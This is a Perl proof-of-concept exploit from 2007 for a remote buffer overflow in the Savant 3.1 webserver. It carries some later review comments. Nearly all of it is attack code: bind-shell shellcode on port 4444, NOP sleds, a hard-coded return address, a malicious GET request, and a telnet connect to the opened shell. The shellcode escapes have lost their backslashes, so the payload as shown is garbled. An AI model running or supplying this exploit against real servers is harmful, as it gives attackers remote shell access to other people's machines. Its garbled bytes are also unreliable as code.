# Title : Savant 3.1 Get Request Remote Overflow Exploit (Universal)
# Published : 2007-08-12
# Author : Jacopo Cervini
#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka acaro@jervus.it
#
# Historical (2007) proof-of-concept listing, reproduced as published.
# Flat script: no `use strict`, so every variable below is a package global.
use IO::Socket;
# Argument check only tests the second argument (port); a missing host is
# not caught here and surfaces at connect time instead.
if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl <victim> <port>nn";
exit;
}
# Plain TCP connection to the host/port given on the command line.
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
#Metasploit shellcode
$shellcode =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb5".
"x55x45xd4x83xebxfcxe2xf4x49x3fxaex99x5dxacxbax2b".
"x4ax35xcexb8x91x71xcex91x89xdex39xd1xcdx54xaax5f".
"xfax4dxcex8bx95x54xaex9dx3ex61xcexd5x5bx64x85x4d".
"x19xd1x85xa0xb2x94x8fxd9xb4x97xaex20x8ex01x61xfc".
"xc0xb0xcex8bx91x54xaexb2x3ex59x0ex5fxeax49x44x3f".
"xb6x79xcex5dxd9x71x59xb5x76x64x9exb0x3ex16x75x5f".
"xf5x59xcexa4xa9xf8xcex94xbdx0bx2dx5axfbx5bxa9x84".
"x4ax83x23x87xd3x3dx76xe6xddx22x36xe6xeax01xbax04".
"xddx9exa8x28x8ex05xbax02xeaxdcxa0xb2x34xb8x4dxd6".
"xe0x3fx47x2bx65x3dx9cxddx40xf8x12x2bx63x06x16x87".
"xe6x06x06x87xf6x06xbax04xd3x3dx54x88xd3x06xccx35".
"x20x3dxe1xcexc5x92x12x2bx63x3fx55x85xe0xaax95xbc".
"x11xf8x6bx3dxe2xaax93x87xe0xaax95xbcx50x1cxc3x9d".
"xe2xaax93x84xe1x01x10x2bx65xc6x2dx33xccx93x3cx83".
"x4ax83x10x2bx65x33x2fxb0xd3x3dx26xb9x3cxb0x2fx84".
"xecx7cx89x5dx52x3fx01x5dx57x64x85x27x1fxabx07xf9".
"x4bx17x69x47x38x2fx7dx7fx1exfex2dxa6x4bxe6x53x2b".
"xc0x11xbax02xeex02x17x85xe4x04x2fxd5xe4x04x10x85".
"x4ax85x2dx79x6cx50x8bx87x4ax83x2fx2bx4ax62xbax04".
"x3ex02xb9x57x71x31xbax02xe7xaax95xbcx45xdfx41x8b".
"xe6xaax93x2bx65x55x45xd4";
$nop="x90"x201;
$incbh="xfexc7"x4; # inc bh opcode
$incebx="x43"x23; # inc ebx opcode
$asm1 = "x53xc3"; # push ebx,ret opcode
$nop1="x90"x19;
$asm = "x83xc4x8cx54xc3"; # add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are # some opcode not allowed and we have need of space for our shellcode
$nop2="x90"x210;
$eip = "x74x86x41"; # 0x00418674 memory address of pop eax, ret in Savant.exe it's universal
# The whole request is assembled as one string and written with a single
# print; no HTTP method token precedes the " /" path separator.
$exploit = $asm. " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."rnrn" .$nop2.$shellcode;
print $victim $exploit;
print " + Malicious GET request sent ...n";
print "Done.n";
close($victim);
$host = $ARGV[0];
print " + connect to 4444 of $host ...n";
sleep(3);
# NOTE(review): $host is taken verbatim from @ARGV and interpolated into a
# shell command line; list-form system('telnet', $host, '4444') would bypass
# the shell and avoid argument injection if this were ever wrapped.
system("telnet $host 4444");
exit;